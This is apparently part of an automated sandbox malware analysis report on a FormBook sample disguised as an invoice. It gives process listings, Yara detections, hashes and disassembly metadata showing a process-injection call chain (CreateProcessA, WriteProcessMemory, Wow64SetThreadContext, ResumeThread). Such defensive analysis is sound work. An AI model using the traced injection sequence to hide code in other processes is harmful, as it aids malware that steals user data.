                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:7
                                                        Start time:07:57:25
                                                        Start date:14/12/2024
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                        Imagebase:0x2c0000
                                                        File size:27'648 bytes
                                                        MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3924982595.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3925053605.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:07:57:39
                                                        Start date:14/12/2024
                                                        Path:C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe"
                                                        Imagebase:0x600000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3924593962.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:07:57:51
                                                        Start date:14/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff79f9e0000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:10.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:4.3%
                                                          Total number of Nodes:235
                                                          Total number of Limit Nodes:19
                                                          execution_graph 22355 80c0f18 22356 80c10a3 22355->22356 22357 80c0f3e 22355->22357 22357->22356 22360 80c1198 PostMessageW 22357->22360 22362 80c1190 22357->22362 22361 80c1204 22360->22361 22361->22357 22363 80c1198 PostMessageW 22362->22363 22364 80c1204 22363->22364 22364->22357 22206 7bd7438 22207 7bd7464 22206->22207 22211 7bd8650 22207->22211 22217 7bd8640 22207->22217 22208 7bd750e 22212 7bd866b 22211->22212 22214 7bd87f4 22212->22214 22223 7bd8930 22212->22223 22235 7bd8920 22212->22235 22213 7bd87ae 22213->22208 22214->22208 22218 7bd864a 22217->22218 22220 7bd87f4 22218->22220 22221 7bd8930 DrawTextExW 22218->22221 22222 7bd8920 DrawTextExW 22218->22222 22219 7bd87ae 22219->22208 22220->22208 22221->22219 22222->22219 22224 7bd8964 22223->22224 22225 7bd8d9f 22224->22225 22230 7bd8930 DrawTextExW 22224->22230 22231 7bd8920 DrawTextExW 22224->22231 22247 7bd8fe0 22224->22247 22254 7bd8fd0 22224->22254 22226 7bd8f44 22225->22226 22261 7bd96c0 22225->22261 22271 7bd9688 22225->22271 22276 7bd9678 22225->22276 22226->22213 22227 7bd901f 22227->22213 22230->22224 22231->22224 22237 7bd8930 22235->22237 22236 7bd901f 22236->22213 22239 7bd8d9f 22237->22239 22240 7bd8fe0 DrawTextExW 22237->22240 22241 7bd8fd0 DrawTextExW 22237->22241 22242 7bd8930 DrawTextExW 22237->22242 22243 7bd8920 DrawTextExW 22237->22243 22238 7bd8f44 22238->22213 22239->22238 22244 7bd9688 DrawTextExW 22239->22244 22245 7bd9678 DrawTextExW 22239->22245 22246 7bd96c0 DrawTextExW 22239->22246 22240->22237 22241->22237 22242->22237 22243->22237 22244->22236 22245->22236 22246->22236 22248 7bd8fe4 22247->22248 22250 7bd9028 22248->22250 22251 7bd9688 DrawTextExW 22248->22251 22252 7bd9678 DrawTextExW 22248->22252 22253 7bd96c0 DrawTextExW 22248->22253 22249 7bd901f 22249->22224 22250->22224 22251->22249 22252->22249 22253->22249 22255 7bd8fe4 22254->22255 22257 7bd9028 22255->22257 22258 7bd9688 DrawTextExW 22255->22258 22259 7bd9678 DrawTextExW 22255->22259 22260 7bd96c0 DrawTextExW 22255->22260 22256 7bd901f 22256->22224 22257->22224 22258->22256 22259->22256 22260->22256 22262 7bd9696 22261->22262 22263 7bd96c3 22261->22263 22270 7bd96c0 DrawTextExW 22262->22270 22282 7bd96d0 22262->22282 22265 7bd96fa 22263->22265 22289 7bd9d88 22263->22289 22294 7bd9d41 22263->22294 22299 7bd9d98 22263->22299 22264 7bd96b6 22264->22227 22265->22227 22270->22264 22272 7bd9691 22271->22272 22274 7bd96d0 DrawTextExW 22272->22274 22275 7bd96c0 DrawTextExW 22272->22275 22273 7bd96b6 22273->22227 22274->22273 22275->22273 22277 7bd964e 22276->22277 22278 7bd967b 22276->22278 22277->22227 22280 7bd96d0 DrawTextExW 22278->22280 22281 7bd96c0 DrawTextExW 22278->22281 22279 7bd96b6 22279->22227 22280->22279 22281->22279 22283 7bd96fa 22282->22283 22284 7bd970b 22282->22284 22283->22264 22285 7bd9798 22284->22285 22286 7bd9d98 DrawTextExW 22284->22286 22287 7bd9d88 DrawTextExW 22284->22287 22288 7bd9d41 DrawTextExW 22284->22288 22285->22264 22286->22283 22287->22283 22288->22283 22290 7bd9d95 22289->22290 22291 7bd9ec4 22290->22291 22304 7bda378 22290->22304 22309 7bda368 22290->22309 22291->22265 22295 7bd9dab 22294->22295 22296 7bd9ec4 22295->22296 22297 7bda378 DrawTextExW 22295->22297 22298 7bda368 DrawTextExW 22295->22298 22296->22265 22297->22296 22298->22296 22300 7bd9dab 22299->22300 22301 7bd9ec4 22300->22301 22302 7bda378 DrawTextExW 22300->22302 22303 7bda368 DrawTextExW 22300->22303 22301->22265 22302->22301 22303->22301 22305 7bda38e 22304->22305 22314 7bda789 22305->22314 22319 7bda798 22305->22319 22306 7bda404 22306->22291 22310 7bda38e 22309->22310 22312 7bda789 DrawTextExW 22310->22312 22313 7bda798 DrawTextExW 22310->22313 22311 7bda404 22311->22291 22312->22311 22313->22311 22315 7bda798 22314->22315 22323 7bda7d8 22315->22323 22328 7bda7c8 22315->22328 22316 7bda7b6 22316->22306 22321 7bda7d8 DrawTextExW 22319->22321 22322 7bda7c8 DrawTextExW 22319->22322 22320 7bda7b6 22320->22306 22321->22320 22322->22320 22324 7bda809 22323->22324 22325 7bda836 22324->22325 22333 7bda858 22324->22333 22338 7bda848 22324->22338 22325->22316 22329 7bda7d8 22328->22329 22330 7bda836 22329->22330 22331 7bda858 DrawTextExW 22329->22331 22332 7bda848 DrawTextExW 22329->22332 22330->22316 22331->22330 22332->22330 22335 7bda879 22333->22335 22334 7bda88e 22334->22325 22335->22334 22343 7bd9c40 22335->22343 22337 7bda8f9 22340 7bda879 22338->22340 22339 7bda88e 22339->22325 22340->22339 22341 7bd9c40 DrawTextExW 22340->22341 22342 7bda8f9 22341->22342 22345 7bd9c4b 22343->22345 22344 7bdbea9 22344->22337 22345->22344 22349 7bdc978 22345->22349 22352 7bdc968 22345->22352 22346 7bdbfbc 22346->22337 22350 7bdb4b4 DrawTextExW 22349->22350 22351 7bdc995 22350->22351 22351->22346 22353 7bdc995 22352->22353 22354 7bdb4b4 DrawTextExW 22352->22354 22353->22346 22354->22353 22365 7bd29a8 22366 7bd29e2 22365->22366 22367 7bd2a5e 22366->22367 22368 7bd2a73 22366->22368 22373 7bd11fc 22367->22373 22370 7bd11fc 3 API calls 22368->22370 22372 7bd2a82 22370->22372 22375 7bd1207 22373->22375 22374 7bd2a69 22375->22374 22378 7bd3468 22375->22378 22384 7bd3457 22375->22384 22391 7bd1254 22378->22391 22381 7bd348f 22381->22374 22382 7bd34b8 CreateIconFromResourceEx 22383 7bd3536 22382->22383 22383->22374 22385 7bd3468 22384->22385 22386 7bd1254 CreateIconFromResourceEx 22385->22386 22387 7bd3482 22386->22387 22388 7bd348f 22387->22388 22389 7bd34b8 CreateIconFromResourceEx 22387->22389 22388->22374 22390 7bd3536 22389->22390 22390->22374 22392 7bd34b8 CreateIconFromResourceEx 22391->22392 22393 7bd3482 22392->22393 22393->22381 22393->22382 22394 7bd5a18 22395 7bd5a20 CloseHandle 22394->22395 22396 7bd5a87 22395->22396 22397 5d4f868 22398 5d4f882 22397->22398 22414 80c0369 22398->22414 22417 80c09d2 22398->22417 22422 80c0111 22398->22422 22425 80c0257 22398->22425 22430 80c03b7 22398->22430 22435 80c0335 22398->22435 22438 80c05db 22398->22438 22441 80c043b 22398->22441 22445 80c021f 22398->22445 22449 80c01dc 22398->22449 22452 80c04c3 22398->22452 22455 80c02a1 22398->22455 22460 80c042b 22398->22460 22465 80c060a 22398->22465 22399 5d4f8a6 22468 5d4e800 22414->22468 22418 80c09d8 22417->22418 22472 5d4e8f0 22418->22472 22419 80c09d9 22421 5d4e8f0 ReadProcessMemory 22419->22421 22421->22419 22476 5d4ea88 22422->22476 22426 80c025d 22425->22426 22480 80c0e98 22426->22480 22484 80c0ea8 22426->22484 22427 80c019f 22427->22399 22492 80c0d68 22430->22492 22496 80c0d59 22430->22496 22431 80c03b6 22431->22430 22432 80c0170 22431->22432 22432->22399 22504 5d4e740 22435->22504 22439 80c05e4 22438->22439 22440 5d4e8f0 ReadProcessMemory 22439->22440 22440->22439 22442 80c084f 22441->22442 22444 5d4e230 Wow64SetThreadContext 22442->22444 22443 80c086a 22444->22443 22446 80c022c 22445->22446 22448 5d4e800 WriteProcessMemory 22446->22448 22447 80c05bf 22447->22399 22448->22447 22450 80c0219 22449->22450 22451 5d4e8f0 ReadProcessMemory 22450->22451 22451->22450 22454 5d4e800 WriteProcessMemory 22452->22454 22453 80c0482 22454->22453 22456 80c026e 22455->22456 22457 80c019f 22456->22457 22458 80c0e98 ResumeThread 22456->22458 22459 80c0ea8 ResumeThread 22456->22459 22457->22399 22458->22457 22459->22457 22461 80c03b6 22460->22461 22461->22460 22462 80c0170 22461->22462 22463 80c0d68 Wow64SetThreadContext 22461->22463 22464 80c0d59 Wow64SetThreadContext 22461->22464 22462->22399 22463->22461 22464->22461 22466 80c0610 22465->22466 22467 5d4e8f0 ReadProcessMemory 22466->22467 22467->22466 22469 5d4e848 WriteProcessMemory 22468->22469 22471 5d4e89f 22469->22471 22471->22399 22473 5d4e93b ReadProcessMemory 22472->22473 22475 5d4e97f 22473->22475 22475->22419 22477 5d4eb11 CreateProcessA 22476->22477 22479 5d4ecd3 22477->22479 22481 80c0ea8 22480->22481 22488 5d4e180 22481->22488 22485 80c0ebd 22484->22485 22487 5d4e180 ResumeThread 22485->22487 22486 80c0ed0 22486->22427 22487->22486 22489 5d4e1c0 ResumeThread 22488->22489 22491 5d4e1f1 22489->22491 22491->22427 22493 80c0d6f 22492->22493 22500 5d4e230 22493->22500 22497 80c0d62 22496->22497 22499 5d4e230 Wow64SetThreadContext 22497->22499 22498 80c0d93 22498->22431 22499->22498 22501 5d4e275 Wow64SetThreadContext 22500->22501 22503 5d4e2bd 22501->22503 22503->22431 22505 5d4e780 VirtualAllocEx 22504->22505 22507 5d4e7bd 22505->22507

                                                          Executed Functions

                                                          Function 07BD11FC Relevance: 6.9, Strings: 5, Instructions: 651COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 7bd11fc-7bd2ac8 3 7bd2ace-7bd2ad3 0->3 4 7bd2fab-7bd3014 0->4 3->4 5 7bd2ad9-7bd2af6 3->5 11 7bd301b-7bd30a3 4->11 10 7bd2afc-7bd2b00 5->10 5->11 13 7bd2b0f-7bd2b13 10->13 14 7bd2b02-7bd2b0c call 7bd120c 10->14 54 7bd30ae-7bd312e 11->54 18 7bd2b15-7bd2b1f call 7bd120c 13->18 19 7bd2b22-7bd2b29 13->19 14->13 18->19 22 7bd2b2f-7bd2b5f 19->22 23 7bd2c44-7bd2c49 19->23 32 7bd332e-7bd33ae 22->32 37 7bd2b65-7bd2c38 call 7bd1218 * 2 22->37 27 7bd2c4b-7bd2c4f 23->27 28 7bd2c51-7bd2c56 23->28 27->28 29 7bd2c58-7bd2c5c 27->29 30 7bd2c68-7bd2c98 call 7bd1224 * 3 28->30 29->32 33 7bd2c62-7bd2c65 29->33 30->54 55 7bd2c9e-7bd2ca1 30->55 56 7bd33b7-7bd33d4 32->56 57 7bd33b0-7bd33b6 32->57 33->30 37->23 67 7bd2c3a 37->67 75 7bd3135-7bd31b7 54->75 55->54 60 7bd2ca7-7bd2ca9 55->60 57->56 60->54 61 7bd2caf-7bd2ce4 60->61 74 7bd2cea-7bd2cf3 61->74 61->75 67->23 76 7bd2cf9-7bd2d53 call 7bd1224 * 2 call 7bd1234 * 2 74->76 77 7bd2e56-7bd2e5a 74->77 81 7bd31bf-7bd3241 75->81 120 7bd2d65 76->120 121 7bd2d55-7bd2d5e 76->121 77->81 82 7bd2e60-7bd2e64 77->82 85 7bd3249-7bd3276 81->85 82->85 86 7bd2e6a-7bd2e70 82->86 98 7bd327d-7bd32fd 85->98 87 7bd2e74-7bd2ea9 86->87 88 7bd2e72 86->88 93 7bd2eb0-7bd2eb6 87->93 88->93 93->98 99 7bd2ebc-7bd2ec4 93->99 154 7bd3304-7bd3326 98->154 104 7bd2ecb-7bd2ecd 99->104 105 7bd2ec6-7bd2eca 99->105 110 7bd2f2f-7bd2f35 104->110 111 7bd2ecf-7bd2ef3 104->111 105->104 117 7bd2f54-7bd2f82 110->117 118 7bd2f37-7bd2f52 110->118 142 7bd2efc-7bd2f00 111->142 143 7bd2ef5-7bd2efa 111->143 131 7bd2f8a-7bd2f96 117->131 118->131 126 7bd2d69-7bd2d6b 120->126 121->126 128 7bd2d60-7bd2d63 121->128 134 7bd2d6d 126->134 135 7bd2d72-7bd2d76 126->135 128->126 153 7bd2f9c-7bd2fa8 131->153 131->154 134->135 140 7bd2d78-7bd2d7f 135->140 141 7bd2d84-7bd2d8a 135->141 151 7bd2e21-7bd2e25 140->151 146 7bd2d8c-7bd2d92 141->146 147 7bd2d94-7bd2d99 141->147 142->32 150 7bd2f06-7bd2f09 142->150 152 7bd2f0c-7bd2f1d 143->152 155 7bd2d9f-7bd2da5 146->155 147->155 150->152 157 7bd2e44-7bd2e50 151->157 158 7bd2e27-7bd2e41 151->158 192 7bd2f1f call 7bd3468 152->192 193 7bd2f1f call 7bd3457 152->193 154->32 162 7bd2dab-7bd2db0 155->162 163 7bd2da7-7bd2da9 155->163 157->76 157->77 158->157 167 7bd2db2-7bd2dc4 162->167 163->167 165 7bd2f25-7bd2f2d 165->131 173 7bd2dce-7bd2dd3 167->173 174 7bd2dc6-7bd2dcc 167->174 176 7bd2dd9-7bd2de0 173->176 174->176 178 7bd2de6 176->178 179 7bd2de2-7bd2de4 176->179 183 7bd2deb-7bd2df6 178->183 179->183 184 7bd2df8-7bd2dfb 183->184 185 7bd2e1a 183->185 184->151 187 7bd2dfd-7bd2e03 184->187 185->151 188 7bd2e0a-7bd2e13 187->188 189 7bd2e05-7bd2e08 187->189 188->151 191 7bd2e15-7bd2e18 188->191 189->185 189->188 191->151 191->185 192->165 193->165
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hgq$Hgq$Hgq$Hgq$Hgq
                                                          • API String ID: 0-2022333140
                                                          • Opcode ID: f67847170c6dda384b300a0cc4742fb41252d6c7879fc906322e48373f032e88
                                                          • Instruction ID: 24d52590c9883acb9e7fcbdfdd02b4461e23ad9b7fe5b4b89bef321d54a1b20a
                                                          • Opcode Fuzzy Hash: f67847170c6dda384b300a0cc4742fb41252d6c7879fc906322e48373f032e88
                                                          • Instruction Fuzzy Hash: EF423DB0A00259CFEB54DFA9C85479EBBF2BF88300F1485A9D409AB395EB349D45CF91
                                                          Function 07BD8930 Relevance: .5, Instructions: 483COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c59177dd5655e0be5689561a2d01d8d40745ffe0c3c3a55131cfd64054606f05
                                                          • Instruction ID: 72d2856e5c7b1c6a96c142273a69a6aceafa8d488a224dbe8bbfe989a8e0055d
                                                          • Opcode Fuzzy Hash: c59177dd5655e0be5689561a2d01d8d40745ffe0c3c3a55131cfd64054606f05
                                                          • Instruction Fuzzy Hash: 15225BB0A10219CFDB14DF68D884A9DBBB2FF85311F55C599E809AB225EB30AD85CF50
                                                          Function 07BD2A90 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cd1d9408c97c3b6cea1277928deb9b111643b14a9f78e90b084c547ef0008f4
                                                          • Instruction ID: 4dbf7c64143983ae6541200940c73398f3fbeb39db4d4adb24ad014f5047f280
                                                          • Opcode Fuzzy Hash: 9cd1d9408c97c3b6cea1277928deb9b111643b14a9f78e90b084c547ef0008f4
                                                          • Instruction Fuzzy Hash: A2C149B1A00259CFEF24CFA9D880799BBF2FF89310F1481A9D449AB255EB309D85CF51
                                                          Function 05D4EA88 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 245 5d4ea88-5d4eb1d 247 5d4eb56-5d4eb76 245->247 248 5d4eb1f-5d4eb29 245->248 253 5d4ebaf-5d4ebde 247->253 254 5d4eb78-5d4eb82 247->254 248->247 249 5d4eb2b-5d4eb2d 248->249 251 5d4eb50-5d4eb53 249->251 252 5d4eb2f-5d4eb39 249->252 251->247 255 5d4eb3d-5d4eb4c 252->255 256 5d4eb3b 252->256 264 5d4ec17-5d4ecd1 CreateProcessA 253->264 265 5d4ebe0-5d4ebea 253->265 254->253 257 5d4eb84-5d4eb86 254->257 255->255 258 5d4eb4e 255->258 256->255 259 5d4eb88-5d4eb92 257->259 260 5d4eba9-5d4ebac 257->260 258->251 262 5d4eb94 259->262 263 5d4eb96-5d4eba5 259->263 260->253 262->263 263->263 266 5d4eba7 263->266 276 5d4ecd3-5d4ecd9 264->276 277 5d4ecda-5d4ed60 264->277 265->264 267 5d4ebec-5d4ebee 265->267 266->260 269 5d4ebf0-5d4ebfa 267->269 270 5d4ec11-5d4ec14 267->270 271 5d4ebfc 269->271 272 5d4ebfe-5d4ec0d 269->272 270->264 271->272 272->272 273 5d4ec0f 272->273 273->270 276->277 287 5d4ed70-5d4ed74 277->287 288 5d4ed62-5d4ed66 277->288 289 5d4ed84-5d4ed88 287->289 290 5d4ed76-5d4ed7a 287->290 288->287 291 5d4ed68 288->291 293 5d4ed98-5d4ed9c 289->293 294 5d4ed8a-5d4ed8e 289->294 290->289 292 5d4ed7c 290->292 291->287 292->289 296 5d4edae-5d4edb5 293->296 297 5d4ed9e-5d4eda4 293->297 294->293 295 5d4ed90 294->295 295->293 298 5d4edb7-5d4edc6 296->298 299 5d4edcc 296->299 297->296 298->299
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05D4ECBE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 30da97ec2e8689290f6f090d07b4ed8354d79b5d357ff3152add2c5f57a7e5fa
                                                          • Instruction ID: 340d2a9a3743d2e7864a73a6361abe4fd8d409f5ff58e2003f56b64a0cf7e519
                                                          • Opcode Fuzzy Hash: 30da97ec2e8689290f6f090d07b4ed8354d79b5d357ff3152add2c5f57a7e5fa
                                                          • Instruction Fuzzy Hash: 8C914971D002199FDF20CFA8C845BEDBBB6FF48314F1485AAD819A7284DB749985CF92
                                                          Function 07BD3468 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 301 7bd3468-7bd348d call 7bd1254 304 7bd348f-7bd349f 301->304 305 7bd34a2-7bd3534 CreateIconFromResourceEx 301->305 309 7bd353d-7bd355a 305->309 310 7bd3536-7bd353c 305->310 310->309
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0
                                                          • Opcode ID: f937a24c855bf842aa29548aee364df8efab8dc566c106d84a07284b2929a3cf
                                                          • Instruction ID: 8ed6c694b109256f49060acf50baa17b90db63b07e52abf4124c0b3152e89421
                                                          • Opcode Fuzzy Hash: f937a24c855bf842aa29548aee364df8efab8dc566c106d84a07284b2929a3cf
                                                          • Instruction Fuzzy Hash: 783189B1900389DFCB11DFA9D844ADABFF8EB49310F14809AE954A7211D3359954DFA1
                                                          Function 07BDB4B4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 313 7bdb4b4-7bdc9fc 315 7bdc9fe-7bdca04 313->315 316 7bdca07-7bdca16 313->316 315->316 317 7bdca18 316->317 318 7bdca1b-7bdca54 DrawTextExW 316->318 317->318 319 7bdca5d-7bdca7a 318->319 320 7bdca56-7bdca5c 318->320 320->319
                                                          APIs
                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07BDC995,?,?), ref: 07BDCA47
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: DrawText
                                                          • String ID:
                                                          • API String ID: 2175133113-0
                                                          • Opcode ID: 27e50a5dec861d50fb0814367d8407c686b8dcdc6d0ac781360fd3991a272b79
                                                          • Instruction ID: 37f73ebaf1c388c863715e1ce66ab56a82944f7c2a7497d54f76836f19d724c3
                                                          • Opcode Fuzzy Hash: 27e50a5dec861d50fb0814367d8407c686b8dcdc6d0ac781360fd3991a272b79
                                                          • Instruction Fuzzy Hash: 4E31C2B5D0034A9FDB10CF9AD884ADEBBF5EB48320F14846AE919A7310D374A944CFA0
                                                          Function 07BDC9A8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 323 7bdc9a8-7bdc9fc 324 7bdc9fe-7bdca04 323->324 325 7bdca07-7bdca16 323->325 324->325 326 7bdca18 325->326 327 7bdca1b-7bdca54 DrawTextExW 325->327 326->327 328 7bdca5d-7bdca7a 327->328 329 7bdca56-7bdca5c 327->329 329->328
                                                          APIs
                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07BDC995,?,?), ref: 07BDCA47
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2284192471.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7bd0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: DrawText
                                                          • String ID:
                                                          • API String ID: 2175133113-0
                                                          • Opcode ID: d0e0b5c11d2437377ad088aee92795b55b2104bd340c1d8774689e0ce1d0afe8
                                                          • Instruction ID: 753eaf4789513bea355072a966edc2a9f142caadf5b17ebdee18d221eefe32c1
                                                          • Opcode Fuzzy Hash: d0e0b5c11d2437377ad088aee92795b55b2104bd340c1d8774689e0ce1d0afe8
                                                          • Instruction Fuzzy Hash: A831B1B5D0124A9FDB10CF9AD884ADEBBF5EB48310F14846AE459A7710D374A954CFA0
                                                          Function 05D4E800 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 332 5d4e800-5d4e84e 334 5d4e850-5d4e85c 332->334 335 5d4e85e-5d4e89d WriteProcessMemory 332->335 334->335 337 5d4e8a6-5d4e8d6 335->337 338 5d4e89f-5d4e8a5 335->338 338->337
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05D4E890
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 0740d7b565bf44d7caace90fa8b10d85f2c5f14be75b7c5efe58a538270ad564
                                                          • Instruction ID: 5f91063cb0c75ae5a514721371e3b08623deeb062eea90818bcf84a5fe3d96b1
                                                          • Opcode Fuzzy Hash: 0740d7b565bf44d7caace90fa8b10d85f2c5f14be75b7c5efe58a538270ad564
                                                          • Instruction Fuzzy Hash: DF21F5B5D003499FCB10DFA9C885BDEBBF5FB88310F10842AE919A7240D7789954DBA1
                                                          Function 05D4E230 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 342 5d4e230-5d4e27b 344 5d4e27d-5d4e289 342->344 345 5d4e28b-5d4e2bb Wow64SetThreadContext 342->345 344->345 347 5d4e2c4-5d4e2f4 345->347 348 5d4e2bd-5d4e2c3 345->348 348->347
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D4E2AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d40000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 561424166f01b8e6bd49519c85d6c4f184179d3ffee1ea5f202e90ac6a28fdce
                                                          • Instruction ID: 8b23018d199f2cc0902b002bfcfb7b8d3ddab0088bc23032a13b472045168ce9
                                                          • Opcode Fuzzy Hash: 561424166f01b8e6bd49519c85d6c4f184179d3ffee1ea5f202e90ac6a28fdce
                                                          • Instruction Fuzzy Hash: 3921F571D003099FDB10DFAAC485BEEBBF4FB88324F14842AD559A7240CB78A945CFA1
                                                          Function 05D4E8F0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 352 5d4e8f0-5d4e97d ReadProcessMemory 355 5d4e986-5d4e9b6 352->355 356 5d4e97f-5d4e985 352->356 356->355
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D4E970
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2283225141.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
